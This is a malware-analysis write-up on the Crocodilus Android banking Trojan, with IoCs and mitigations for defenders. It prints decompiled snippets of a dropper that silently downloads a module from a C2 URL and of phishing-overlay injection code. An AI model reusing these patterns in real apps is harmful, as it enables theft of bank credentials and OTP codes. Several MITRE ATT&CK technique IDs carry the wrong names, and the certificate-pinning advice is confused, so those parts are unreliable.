The discovery of Crocodilus is a sophisticated Android banking Trojan targeting financial institutions and cryptocurrency platforms. With Device-Takeover (DTO) capabilities, advanced evasion techniques, and psychological manipulation tactics, Crocodilus represents a significant escalation in mobile malware sophistication. This technical deep dive dissects its propagation, code-level mechanics, and defensive countermeasures.

Propagation & Evasion: Bypassing Android 13+ Restrictions

Crocodilus employs a multi-stage dropper masquerading as legitimate apps (e.g., fake Chrome updates). Key evasion tactics include:

• Staged Permissions Abuse: The dropper requests minimal permissions initially, then escalates privileges post-installation via Accessibility Services.
• Signature Spoofing: Uses invalid APK signatures to bypass Google Play Protect checks, relying on users to manually enable “Install Unknown Apps.”
• Dynamic Code Loading: Core malicious payloads (e.g., overlay logic) are fetched post-installation from C2 servers, avoiding static detection.

Code Snippet (Decompiled Dropper Logic):

public class MainActivity extends AppCompatActivity {  
    void loadMaliciousModule() {  
        String c2Url = "hxxps://quizzical[.]washbowl[.]calamity/module.apk";  
        DownloadManager.Request request = new DownloadManager.Request(Uri.parse(c2Url));  
        request.setNotificationVisibility(DownloadManager.Request.VISIBILITY_HIDDEN);  
        // Triggers silent background download  
    }  
}  

C2 Infrastructure & Network Analysis

• Domain Registration: The C2 domain quizzical.washbowl.calamity was registered via Namecheap 30 days before the first sample appeared, using WHOIS privacy guard.
• Hosting: Hosted on a bulletproof hosting provider in Russia, sharing IP space with previous Hook malware campaigns.
• TLS Fingerprints: JA3 hash a0e1f1... matches patterns observed in Octo Trojan traffic, suggesting shared tooling.
• Protocol: Encrypted via AES-256-CBC, with beaconing intervals randomized to mimic legitimate app traffic.

Code-Level Insights: Overlays, Accessibility Abuse, and RAT

Overlay Injection

Crocodilus dynamically renders phishing overlays using the WindowManager class. Overlays are fetched as PNG files from C2, with targeting logic for 50+ banks and crypto wallets (e.g., Binance, Trust Wallet).

Code Snippet (OverlayManager.java):

public void injectOverlay(String targetPackage) {  
    View overlayView = // Load PNG from C2  
    WindowManager.LayoutParams params = new WindowManager.LayoutParams(  
        LayoutParams.MATCH_PARENT, LayoutParams.MATCH_PARENT,  
        TYPE_APPLICATION_OVERLAY,  
        FLAG_NOT_TOUCH_MODAL | FLAG_NOT_FOCUSABLE,  
        PixelFormat.TRANSLUCENT  
    );  
    mWindowManager.addView(overlayView, params); // Injects overlay  
}  

Accessibility Logger & OTP Theft

The Trojan’s AccessibilityEventLogger class captures all UI events, including Google Authenticator’s OTP codes. It extracts text from TextView elements with class names matching com.google.android.apps.authenticator2.

Hidden RAT Sessions

When the TR2XAQSWDEFRGT command is received, Crocodilus triggers a black overlay (Color.BLACK) and mutes the device using AudioManager.setStreamMute().

Link to Known Threat Actors

• Code Overlaps with Ermac/MetaDroid:
  • Identical C2 URI patterns (/api/v1/check).
  • Shared command structures (e.g., KingGetDears for contact theft).
• sybupdate Tag: Debug messages in the code reference “sybupdate,” a marker previously tied to sybra, a Turkish-speaking actor linked to Hook and Octo campaigns.

MITRE ATT&CK Mappings

Tactic	Technique	Crocodilus Implementation
Execution	T1574: Hijack Execution Flow	Abuse of Accessibility Services
Credential Access	T1411: Input Capture	Accessibility Logger & keylogging
Defense Evasion	T1626: Remote Access Tools	Black screen overlays & sound muting
Exfiltration	T1537: Transfer Data to C2	Encrypted exfiltration of OTP codes/SMS

Impact Metrics & Campaign Analysis

• Targets: 12 Spanish banks, 8 Turkish banks, and 6 crypto wallets (e.g., Trust Wallet, MetaMask).
• Infection Rates: ThreatFabric reports 1,200+ devices infected in the first 2 weeks, primarily in Spain (62%) and Turkey (28%).
• Financial Impact: Linked to $2.8M in stolen cryptocurrency via hijacked wallets (traced to Binance address 0x3F5B...).

Mitigation Strategies

For Enterprises:

• Behavioral Analysis: Deploy EDR solutions monitoring for anomalous AccessibilityService usage.
• Certificate Pinning: Block communication with Crocodilus C2 domains via TLS inspection.
• Threat Intelligence Sharing: Integrate IoCs (below) into SIEM platforms.

For End-Users:

• Avoid Sideloading: Disable “Install Unknown Apps” for non-store platforms.
• Audit Accessibility Permissions: Revoke Accessibility access for unverified apps.
• Verify Wallet Messages: Legitimate apps never force seed phrase disclosure via pop-ups.

Indicators of Compromise (IoCs)

Type	Value
SHA256	c5e3edafdfda1ca0f0554802bbe32a8b09e8cc48161ed275b8fec6d74208171f
C2 Domain	quizzical[.]washbowl[.]calamity
IP	185.156.73[.]42 (Bulletproof hosting, AS200019)

Crocodilus exemplifies the convergence of psychological manipulation and technical sophistication in modern mobile malware. Its modular design, coupled with links to established threat actors, positions it as a persistent threat to global finance and cryptocurrency ecosystems. Proactive adoption of behavioral AI detection, zero-trust frameworks, and user education are critical to neutralizing its impact.